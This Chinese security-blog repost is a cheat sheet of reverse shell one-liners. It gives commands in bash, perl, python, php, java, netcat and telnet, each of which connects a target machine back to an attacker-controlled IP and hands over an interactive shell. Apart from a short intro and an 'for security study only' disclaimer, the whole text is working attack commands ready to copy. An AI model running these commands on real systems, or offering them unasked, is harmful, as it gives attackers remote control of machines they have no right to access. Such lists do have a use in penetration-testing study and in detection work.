多姿势弹shell 不怕姿势多,就怕记不住

admin 2024年11月1日14:13:59评论16 views字数 1198阅读3分59秒阅读模式

反弹shell是我们最便捷的与目标建立连接的方式之一。本文为大家简单的汇总下常用的shell反弹姿势😘,希望对您的学习有所帮助。

bash

bash -i >& /dev/tcp/192.168.123.55/8080 0>&1

perl

Linux

perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 

Windows

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' 

python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 

php

<?php
php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
?>

java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do $line 2>&5 >&5; done"] as String[])
p.waitFor()

nc

nc -e /bin/sh 192.168.123.55 1234 

telnet

telnet attackerip 4444 | /bin/bash | telnet attackerip 4445

总结

本文对我们常用的shell反弹方法进行了简单的总结。具体反弹需结合实际情况而定。另外文本提供思路仅供网络安全学习和研究,反对一切危害网络安全的行为!

更多精彩文章 欢迎关注我们

原文始发于微信公众号(kali黑客笔记):多姿势弹shell 不怕姿势多,就怕记不住

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月1日14:13:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   多姿势弹shell 不怕姿势多,就怕记不住https://cn-sec.com/archives/1829716.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息